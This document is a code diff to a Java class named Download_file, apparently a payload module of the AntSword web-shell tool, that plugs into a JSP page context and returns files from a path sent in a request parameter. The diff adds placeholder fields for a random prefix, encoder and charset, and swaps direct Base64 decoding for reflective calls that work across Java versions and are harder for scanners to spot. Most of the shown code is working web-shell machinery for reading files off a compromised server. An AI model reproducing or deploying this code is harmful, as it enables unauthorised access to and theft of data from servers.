@@ -8,18 +8,23 @@ import java.io.ByteArrayOutputStream;
 import java.io.FileInputStream;
 
 public class Download_file {
+    public String encoder;
+    public String cs;
+    public String randomPrefix;
+
     @Override
     public boolean equals(Object obj) {
         PageContext page = (PageContext) obj;
         ServletRequest request = page.getRequest();
         ServletResponse response = page.getResponse();
-        String encoder = request.getParameter("encoder") != null ? request.getParameter("encoder") : "";
-        String cs = request.getParameter("charset") != null ? request.getParameter("charset") : "UTF-8";
+        randomPrefix = "antswordrandomPrefix";
+        encoder = "base64";
+        cs = "antswordCharset";
         StringBuffer output = new StringBuffer("");
         StringBuffer sb = new StringBuffer("");
         String tag_s = "->|";
         String tag_e = "|<-";
-        String varkey1 = "antswordarg1";
+        String varkey1 = "antswordargpath";
         try {
             response.setContentType("text/html");
             request.setCharacterEncoding(cs);
@@ -42,6 +47,13 @@ public class Download_file {
     }
 
     String decode(String str, String encode, String cs) throws Exception {
+        int prefixlen = 0;
+        try {
+            prefixlen = Integer.parseInt(randomPrefix);
+            str = str.substring(prefixlen);
+        } catch (Exception e) {
+            prefixlen = 0;
+        }
         if (encode.equals("hex") || encode == "hex") {
             if (str == "null" || str.equals("null")) {
                 return "";
@@ -57,8 +69,17 @@ public class Download_file {
             return baos.toString("UTF-8");
         } else if (encode.equals("base64") || encode == "base64") {
             byte[] bt = null;
-            sun.misc.BASE64Decoder decoder = new sun.misc.BASE64Decoder();
-            bt = decoder.decodeBuffer(str);
+            String version = System.getProperty("java.version");
+            if (version.compareTo("1.9") >= 0) {
+                Class Base64 = Class.forName("java.util.Base64");
+                Object Decoder = Base64.getMethod("getDecoder", new Class[0]).invoke(Base64, new  Object[]{});
+                bt = (byte[])Decoder.getClass().getMethod("decode", String.class).invoke(Decoder, str);   
+            } else {
+                Class Base64 = Class.forName("sun.misc.BASE64Decoder");
+                Object Decoder = Base64.getDeclaredConstructor().newInstance();
+                bt = (byte[])Decoder.getClass().getMethod("decodeBuffer", String.class).invoke(Decoder, str);
+            }
+            
             return new String(bt, "UTF-8");
         }
         return str;
